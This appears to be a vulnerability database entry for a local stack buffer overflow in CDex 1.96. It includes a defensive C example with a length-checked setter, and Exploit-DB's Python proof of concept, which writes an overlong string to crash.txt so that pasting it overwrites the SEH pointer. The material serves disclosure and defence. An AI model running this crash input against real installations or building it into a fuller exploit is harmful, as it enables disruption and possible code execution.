Vendor: CDex
By: bzyo
CVSS: 7.8 (HIGH)
CWE: 119 (Stack Buffer Overflow)
Product Name: CDex
Affected Version From: v1.96
Affected Version To: v1.96
Patch Exists: YES
Related CWE: N/A
CPE: a:cdex:cdex:1.96
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x32
Year: 2017

CDex 1.96 – Local Stack Buffer Overflow

CDex 1.96 (Unicode Build) is vulnerable to a local stack buffer overflow. An attacker can exploit this vulnerability by generating a crash.txt file, opening the application, going to Options > Settings > Encoding > Tags, and pasting the contents of crash.txt into the picture text field. The application crashes with the pointer to the next SEH record overwritten with 00420042; the author notes no Unicode ppr (pop/pop/ret) pointers.

Mitigation:

Update to the latest version of CDex 1.96 (Unicode Build)
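
Added example (not from the original page and not CDex code): a bounded setter for a fixed-size UTF-16 text field that refuses the 524-character crash.txt input instead of copying it, plus a helper showing why the "B" characters show up as 00420042 in a Unicode build. The buffer capacity, type and function names are assumptions, since the page does not show CDex's source.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed capacity of the field, in UTF-16 code units including the NUL.
   CDex's real buffer size is not given on the page. */
#define PICTURE_TEXT_CAP 260

typedef uint16_t utf16_t;

/* Widen ASCII to UTF-16 the way a Unicode build receives pasted text.
   Writes at most out_cap units (NUL-terminated); returns units needed. */
size_t widen_ascii(const char *in, utf16_t *out, size_t out_cap)
{
    size_t n = strlen(in);
    for (size_t i = 0; i < n && i + 1 < out_cap; i++)
        out[i] = (utf16_t)(unsigned char)in[i];
    if (out_cap > 0)
        out[n < out_cap ? n : out_cap - 1] = 0;
    return n;
}

/* Hardened setter: check the length first and reject, never copy past dst.
   Returns 0 on success, -1 if src (len units, NUL not counted) does not fit. */
int set_picture_text(utf16_t dst[PICTURE_TEXT_CAP], const utf16_t *src, size_t len)
{
    if (len >= PICTURE_TEXT_CAP)
        return -1;                      /* over-long tag text is refused */
    memcpy(dst, src, len * sizeof(utf16_t));
    dst[len] = 0;
    return 0;
}

/* Value x86 reads from two adjacent UTF-16LE units: "BB" -> 0x00420042. */
uint32_t dword_from_units(utf16_t first, utf16_t second)
{
    return (uint32_t)first | ((uint32_t)second << 16);
}

/* Constructed input matching crash.txt: 520 'A' followed by 4 'B'.
   Returns 1 when the setter rejects it and leaves the field untouched. */
int crash_input_rejected(void)
{
    char ascii[525];
    utf16_t wide[525], field[PICTURE_TEXT_CAP] = {0};
    memset(ascii, 'A', 520);
    memset(ascii + 520, 'B', 4);
    ascii[524] = '\0';
    size_t len = widen_ascii(ascii, wide, 525);
    return set_picture_text(field, wide, len) == -1 && field[0] == 0;
}
```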

Exploit-DB raw data:

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96  - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#


out_path = "crash.txt"

# 520 filler characters, then 4 characters that reach the pointer to the next SEH record
crash = "A" * 520 + "B" * 4  # seh

with open(out_path, "w") as out_file:
    out_file.write(crash)